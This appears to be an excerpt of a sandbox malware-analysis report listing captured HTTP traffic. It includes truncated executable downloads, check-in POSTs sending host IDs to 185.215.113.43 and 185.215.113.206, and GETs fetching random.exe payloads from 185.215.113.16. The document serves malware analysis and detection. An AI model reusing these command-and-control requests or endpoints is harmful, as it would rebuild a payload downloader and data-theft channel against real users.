Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 17:22:27 GMTContent-Type: application/octet-streamContent-Length: 922624Last-Modified: Sat, 23 Nov 2024 16:29:48 GMTConnection: keep-aliveETag: "674202fc-e1400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f4 02 42 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 64 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 dd 15 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 74 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 a8 00 00 00 40 0d 00 00 aa 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9e 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 17:22:34 GMTContent-Type: application/octet-streamContent-Length: 2784256Last-Modified: Sat, 23 Nov 2024 16:30:15 GMTConnection: keep-aliveETag: "67420317-2a7c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 d0 ae 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 77 76 66 70 71 70 6a 00 20 2a 00 00 a0 00 00 00 1c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6e 68 66 6c 77 72 77 00 20 00 00 00 c0 2a 00 00 04 00 00 00 56 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 5a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 17:22:44 GMTContent-Type: application/octet-streamContent-Length: 2784256Last-Modified: Sat, 23 Nov 2024 16:30:17 GMTConnection: keep-aliveETag: "67420319-2a7c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 d0 ae 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 77 76 66 70 71 70 6a 00 20 2a 00 00 a0 00 00 00 1c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6e 68 66 6c 77 72 77 00 20 00 00 00 c0 2a 00 00 04 00 00 00 56 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 5a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 17:22:52 GMTContent-Type: application/octet-streamContent-Length: 2784256Last-Modified: Sat, 23 Nov 2024 16:30:17 GMTConnection: keep-aliveETag: "67420319-2a7c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 d0 ae 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 77 76 66 70 71 70 6a 00 20 2a 00 00 a0 00 00 00 1c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6e 68 66 6c 77 72 77 00 20 00 00 00 c0 2a 00 00 04 00 00 00 56 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 5a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 17:23:14 GMTContent-Type: application/octet-streamContent-Length: 2784256Last-Modified: Sat, 23 Nov 2024 16:30:17 GMTConnection: keep-aliveETag: "67420319-2a7c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 d0 ae 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 77 76 66 70 71 70 6a 00 20 2a 00 00 a0 00 00 00 1c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6e 68 66 6c 77 72 77 00 20 00 00 00 c0 2a 00 00 04 00 00 00 56 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 5a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 17:23:29 GMTContent-Type: application/octet-streamContent-Length: 4384256Last-Modified: Sat, 23 Nov 2024 17:21:55 GMTConnection: keep-aliveETag: "67420f33-42e600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 40 c4 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 70 c4 00 00 04 00 00 e5 15 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 23 c4 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 22 c4 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 37 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 63 6e 76 70 74 79 67 00 40 1b 00 00 f0 a8 00 00 34 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 67 78 6b 61 64 77 73 00 10 00 00 00 30 c4 00 00 04 00 00 00 c0 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 c4 00 00 22 00 00 00 c4 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEJanOM/f8BEauEo6GRqguxLgAJt0LBh1uWaBD08sPTthnLouxyOeqq8UXC40zxYtXUeuLL3jc98oc4sgTt8Qg5RgpVyPUGOqQCdIMU+jHj5jPNgpCOYLzgjk7/68jQbYqRpL5buJGDaKHJUU4Qzi5sjC1iwUwrkBZLfklCNSWdGai+iykzR0ELnFD4lJb88vZch+TXuihcRzjbZvJG6mFONQPa3ignNQpsSbQgkMM4xuASI/kaIM+YTU5dBQE1SH8k0CwZj5Yc3H1S94NyGSn+DeuALqccEE8gt3uchW9hnkYs9tmlAQt7GBc9BBk/kSpz+oHgE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1732382781832Host: self.events.data.microsoft.comContent-Length: 7976Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 39 42 37 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22F79B75082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 34 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008483001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 34 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008484001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 39 43 38 39 44 34 37 32 43 42 31 36 38 31 38 39 35 35 38 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a Data Ascii: ------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="hwid"D59C89D472CB1681895587------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="build"mars------IEHCBAFIDAECBGCBFHJE--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
